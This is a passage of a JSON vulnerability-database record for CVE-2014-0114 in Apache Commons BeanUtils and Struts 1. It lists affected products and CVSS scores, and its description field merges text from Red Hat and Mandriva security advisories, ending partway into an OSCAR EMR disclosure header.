"version": "6.0"
},
{
"model": "tiered storage manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "real-time decision server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7"
},
{
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.0"
},
{
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.37"
},
{
"model": "tuning manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "big-ip webaccelerator hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "openpages",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.1"
},
{
"model": "tivoli dynamic workload console",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1"
},
{
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.21"
},
{
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"model": "leads",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.6"
},
{
"model": "sitescope",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "11.24.271"
},
{
"model": "lotus expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.1"
},
{
"model": "tiered storage manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0-00"
},
{
"model": "tiered storage manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.1"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-00"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "tivoli provisioning manager for software",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"model": "global link manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3"
},
{
"model": "network satellite server (for rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6)5.6"
},
{
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "56002"
},
{
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"model": "content navigator",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.2"
},
{
"model": "infosphere identity insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.1"
},
{
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "raplication manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "76000"
},
{
"model": "tivoli netcool/omnibus web gui",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3"
},
{
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"model": "retail clearance optimization engine",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0.1"
},
{
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.1"
},
{
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"model": "security threat response manager 2012.1r7",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.4"
},
{
"model": "global link manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-01"
},
{
"model": "security threat response manager",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "2013.2"
},
{
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "terasoluna server framework for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ntt data",
"version": "2.01"
},
{
"model": "identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.21.0"
},
{
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2.0-00"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.3.1"
},
{
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"model": "tuning manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-0"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.4-00"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "5.0.0-00"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.00"
},
{
"model": "sitescope",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "11.13"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "16.2"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.5.0"
},
{
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.5.0.1"
},
{
"model": "enterprise data quality",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.1.2"
},
{
"model": "predictive insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.20.0"
},
{
"model": "infosphere information server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.2.0"
},
{
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.30"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0"
},
{
"model": "insurance ifrs analyzer",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "178.0.6"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.22.0"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3.0"
},
{
"model": "tivoli system automation application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.2.2"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "tuning manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-03"
},
{
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-50-09"
},
{
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10500"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0"
},
{
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "retail central office 12.0.9in",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1.0.2.0"
},
{
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "77000"
},
{
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.1"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"model": "global link manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-01"
},
{
"model": "websphere partner gateway express edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"model": "global link manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-01"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-10"
},
{
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0.0"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.2.145"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.010"
},
{
"model": "raplication manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.2"
},
{
"model": "raplication manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.13"
},
{
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2"
},
{
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1.1"
},
{
"model": "infosphere mashuphub",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0"
},
{
"model": "vcenter server update",
"scope": "ne",
"trust": 0.3,
"vendor": "vmware",
"version": "5.52"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"model": "tivoli provisioning manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.021"
},
{
"model": "tivoli application dependency discovery manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.1"
},
{
"model": "device manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.6.1-06"
},
{
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.0"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "contact optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1.1-00(x64))"
},
{
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.1"
},
{
"model": "enterprise linux desktop workstation client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-00"
},
{
"model": "manager",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "111.7"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00-01"
},
{
"model": "websphere enterprise service bus",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"model": "tuning manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.4.0-02"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-01"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.2.1-00"
},
{
"model": "big-ip edge gateway hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.3.0-00"
},
{
"model": "tivoli provisioning manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3"
},
{
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-00(x64))"
},
{
"model": "big-ip edge gateway hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "web interface for content management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.4"
},
{
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-03"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.20"
},
{
"model": "tuning manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.4.0-01"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.60"
},
{
"model": "lotus quickr for websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "business process manager express",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00-02"
},
{
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.4"
},
{
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1"
},
{
"model": "contact optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "67121"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Rene Gielen",
"sources": [
{
"db": "BID",
"id": "67121"
},
{
"db": "PACKETSTORM",
"id": "126455"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
}
],
"trust": 1.0
},
"cve": "CVE-2014-0114",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2014-0114",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-0114",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201404-581",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2014-0114",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. Apache Struts is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. \nApache Struts versions 1.0.0 through 1.3.10 are vulnerable. \n\nSecurity Fix(es):\n\n* Apache Struts 1: Class Loader manipulation via request parameters\n(CVE-2014-0114)\n\n* thrift: Improper file path sanitization in\nt_go_generator.cc:format_go_output() of the go client library can allow an\nattacker to inject commands (CVE-2016-5397)\n\n* slf4j: Deserialisation vulnerability in EventData constructor can allow\nfor arbitrary code execution (CVE-2018-8088)\n\n* jolokia: JMX proxy mode vulnerable to remote code execution\n(CVE-2018-1000130)\n\n* bouncycastle: DSA does not fully validate ASN.1 encoding during signature\nverification allowing for injection of unsigned data (CVE-2016-1000338)\n\n* bouncycastle: Information leak in AESFastEngine class (CVE-2016-1000339)\n\n* bouncycastle: Information exposure in DSA signature generation via timing\nattack (CVE-2016-1000341)\n\n* bouncycastle: ECDSA improper validation of ASN.1 encoding of signature\n(CVE-2016-1000342)\n\n* bouncycastle: DHIES implementation allowed the use of ECB mode\n(CVE-2016-1000344)\n\n* bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle\nattack (CVE-2016-1000345)\n\n* bouncycastle: Other party DH public keys are not fully validated\n(CVE-2016-1000346)\n\n* bouncycastle: ECIES implementation allowed the use of ECB mode\n(CVE-2016-1000352)\n\n* async-http-client: Invalid URL parsing with \u0027?\u0027 (CVE-2017-14063)\n\n* undertow: File descriptor leak caused by\nJarURLConnection.getLastModified() allows attacker to cause a denial of\nservice (CVE-2018-1114)\n\n* spring-framework: Directory traversal vulnerability with static resources\non Windows filesystems (CVE-2018-1271)\n\n* tika: Infinite loop in BPGParser can allow remote attacker to cause a\ndenial of service (CVE-2018-1338)\n\n* tika: Infinite loop in ChmParser can allow remote attacker to cause a\ndenial of service (CVE-2018-1339)\n\n* pdfbox: Infinite loop in AFMParser.java allows for out of memory erros\nvia crafted PDF (CVE-2018-8036)\n\n* jolokia: Cross site scripting in the HTTP servlet (CVE-2018-1000129)\n\n* bouncycastle: flaw in the low-level interface to RSA key pair generator\n(CVE-2018-1000180)\n\n* bouncycastle: Carry propagation bug in math.raw.Nat??? class\n(CVE-2016-1000340)\n\n* bouncycastle: DSA key pair generator generates a weak private key by\ndefault (CVE-2016-1000343)\n\n* spring-framework: Multipart content pollution (CVE-2018-1272)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nRed Hat would like to thank Chris McCown for reporting CVE-2018-8088. \n\nInstallation instructions are located in the download section of the\ncustomer portal. Bugs fixed (https://bugzilla.redhat.com/):\n\n1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters\n1487563 - CVE-2017-14063 async-http-client: Invalid URL parsing with \u0027?\u0027\n1544620 - CVE-2016-5397 thrift: Improper file path sanitization in t_go_generator.cc:format_go_output() of the go client library can allow an attacker to inject commands\n1548909 - CVE-2018-8088 slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution\n1559316 - CVE-2018-1000130 jolokia: JMX proxy mode vulnerable to remote code execution\n1559317 - CVE-2018-1000129 jolokia: Cross site scripting in the HTTP servlet\n1564408 - CVE-2018-1272 spring-framework: Multipart content pollution\n1571050 - CVE-2018-1271 spring-framework: Directory traversal vulnerability with static resources on Windows filesystems\n1572421 - CVE-2018-1338 tika: Infinite loop in BPGParser can allow remote attacker to cause a denial of service\n1572424 - CVE-2018-1339 tika: Infinite loop in ChmParser can allow remote attacker to cause a denial of service\n1573045 - CVE-2018-1114 undertow: File descriptor leak caused by JarURLConnection.getLastModified() allows attacker to cause a denial of service\n1588306 - CVE-2018-1000180 bouncycastle: flaw in the low-level interface to RSA key pair generator\n1588313 - CVE-2016-1000338 bouncycastle: DSA does not fully validate ASN.1 encoding during signature verification allowing for injection of unsigned data\n1588314 - CVE-2016-1000344 bouncycastle: DHIES implementation allowed the use of ECB mode\n1588323 - CVE-2016-1000345 bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle attack\n1588327 - CVE-2016-1000346 bouncycastle: Other party DH public keys are not fully validated\n1588330 - CVE-2016-1000352 bouncycastle: ECIES implementation allowed the use of ECB mode\n1588688 - CVE-2016-1000340 bouncycastle: Carry propagation bug in math.raw.Nat??? class\n1588695 - CVE-2016-1000339 bouncycastle: Information leak in AESFastEngine class\n1588708 - CVE-2016-1000341 bouncycastle: Information exposure in DSA signature generation via timing attack\n1588715 - CVE-2016-1000342 bouncycastle: ECDSA improper validation of ASN.1 encoding of signature\n1588721 - CVE-2016-1000343 bouncycastle: DSA key pair generator generates a weak private key by default\n1597490 - CVE-2018-8036 pdfbox: Infinite loop in AFMParser.java allows for out of memory erros via crafted PDF\n\n5. Summary:\n\nFuse ESB Enterprise 7.1.0 R1 P4 (Patch 4 on Rollup Patch 1), a security\nupdate that addresses one security issue, is now available from the Red Hat\nCustomer Portal. \nA remote attacker could use this flaw to manipulate the ClassLoader used by\nan application server running Struts 1. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nRefer to the readme.txt file included with the patch files for\ninstallation instructions. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114\n http://advisories.mageia.org/MGASA-2014-0219.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n 2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm\n 8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm\n fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm\n 3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm \n b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n 7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm \n b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm\n\n Mandriva Business Server 1/X86_64:\n 1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm\n 5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm \n f135f96b6d2121b157b7a62afd449ea6 mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb\nHUtc9GTxbEwte2/fTU7bJ5M=\n=5Ewj\n-----END PGP SIGNATURE-----\n. Title: Multiple vulnerabilities in OSCAR EMR\nProduct: OSCAR EMR\nVendor: Oscar McMaster\nTested version: 15.21beta361\nRemediation status: Unknown\nReported by: Brian D. Hysell\n\n-----\n\nProduct Description:\n\n\"OSCAR is open-source Electronic Medical Record (EMR) software that\nwas first developed at McMaster University by Dr. David Chan. It is\ncontinuously enriched by contributions from OSCAR users and the\nCharter OSCAR Service Providers that support them. OSCAR has been\ncertified by OntarioMD, and verified as IHE compliant, 